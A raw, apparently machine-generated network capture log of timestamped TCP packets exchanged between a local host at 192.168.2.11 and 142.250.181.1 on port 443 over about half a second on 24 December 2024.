                                                                Dec 24, 2024 11:28:49.756582022 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.756839991 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.756891966 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.756901979 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.756947994 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.766314030 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.766617060 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.766675949 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.766685009 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.767642975 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.768309116 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.768362999 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.768372059 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.768426895 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.778079033 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.778469086 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.778529882 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.778538942 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.779371977 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.780108929 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.780163050 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.780170918 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.780215979 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.788871050 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.789321899 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.789386034 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.789393902 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.790153027 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.790950060 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.790956974 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.797600985 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.797686100 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.797738075 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.797748089 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.797794104 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.797871113 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.798844099 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.799096107 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.799103975 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.805915117 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.806030989 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.806087017 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.806094885 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.806139946 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.806454897 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.807235003 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.808235884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.808286905 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.808295965 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.808342934 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.816761971 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.817776918 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.817842007 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.817853928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.818660021 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.818764925 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.818772078 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.832357883 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.832396984 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.832446098 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.832458019 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.832505941 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.832818031 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.833623886 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.834327936 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.834372997 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.834387064 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.834434032 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.846342087 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.847774029 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.847826958 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.847866058 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.847881079 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.847892046 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.847904921 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.860945940 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.861222982 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.861263990 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.861293077 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.861311913 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.861326933 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.862426043 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.862821102 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.862828016 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.874686956 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.874773979 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.874782085 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.875089884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.875876904 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.875933886 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.875942945 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.875987053 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.876723051 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891519070 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891573906 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891606092 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891661882 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.891673088 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891701937 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.892158031 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.894800901 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.894809008 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.902337074 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.902462006 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.902539968 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.902549028 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.902597904 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.902618885 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.903458118 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.906770945 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.906779051 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.911015034 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.911370039 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.911418915 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.911427021 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.911473036 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.911581039 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.912312031 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.914899111 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.914906979 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.923100948 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.923435926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.923489094 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.923496962 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.923548937 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.924098015 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.926047087 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.927040100 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.927047968 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938106060 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938152075 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938189030 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938205957 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.938219070 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938242912 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.939862013 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.943057060 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.943064928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.947303057 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.947613955 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.947674036 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.947683096 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.947735071 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.948447943 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.949311972 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.949358940 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.949367046 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.958755970 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.958817005 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.958825111 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.959614038 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.959661961 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.959670067 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.960385084 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.960433960 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.960441113 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.969379902 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.969443083 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.969451904 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.970247030 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.970294952 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.970307112 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.980834961 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.980897903 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.980909109 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.981267929 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.981311083 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.981359959 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.981369019 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.981419086 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.982173920 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.982950926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.983017921 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.983026028 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.989770889 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.989830017 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.989839077 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.990761042 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.990869999 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.990920067 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.990928888 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.990976095 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.997854948 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.998229027 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.998275995 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.998285055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.999103069 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.999151945 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.999157906 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.008795023 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.008846045 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.008855104 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.009169102 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.009213924 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.009222984 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.010155916 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.010202885 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.010210991 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.024156094 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.024209976 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.024215937 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.024230957 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.024275064 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.024521112 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.025405884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.025449038 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.025458097 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.038539886 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.038595915 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.038605928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.038908958 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.038955927 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.038964987 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.039824963 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.039885044 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.039892912 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.052629948 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.052686930 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.052689075 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.052700043 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.052759886 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.053035021 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.054186106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.054246902 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.054255962 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.066809893 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.066865921 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.066874981 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.067368031 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.067414045 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.067421913 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.068193913 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.068240881 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.068248987 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.080248117 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.080300093 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.080311060 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.080764055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.080822945 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.080831051 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.081535101 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.081583977 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.081592083 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.094286919 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.094336987 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.094345093 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.094355106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.094400883 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.094799042 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.095671892 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.095716000 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.095724106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.103029966 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.103080034 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.103089094 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.103449106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.103492975 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.103499889 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.104281902 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.104331017 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.104337931 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.115328074 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.115377903 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.115395069 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.115859985 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.115907907 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.115916014 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.116674900 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.116718054 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.116730928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.129980087 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.130024910 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.130033016 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.130326033 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.130369902 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.130378008 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.131140947 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.131185055 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.131192923 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.139337063 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.139388084 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.139389992 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.139404058 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.139448881 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.140250921 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.140991926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.141040087 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.141047955 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.150983095 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.151036024 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.151046038 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.151410103 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.151454926 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.151463032 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.152887106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.152930021 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.152939081 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.161328077 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.161382914 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.161391973 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.161744118 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.161793947 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.161801100 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.163321018 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.163369894 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.163377047 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.173017025 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.173468113 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.173523903 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.173535109 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.173584938 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.174168110 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.175009966 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.175378084 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.175386906 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.181777954 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.181884050 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.181936979 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.181948900 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.181998014 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.182544947 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.183743000 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.183790922 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.183806896 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.190087080 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.190558910 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.190618038 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.190628052 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.190675020 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.191222906 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.192028046 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.192074060 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.192081928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.201133013 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.201178074 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.201185942 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.202052116 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.202754974 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.202831984 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.202840090 CET44349707142.250.181.1192.168.2.11
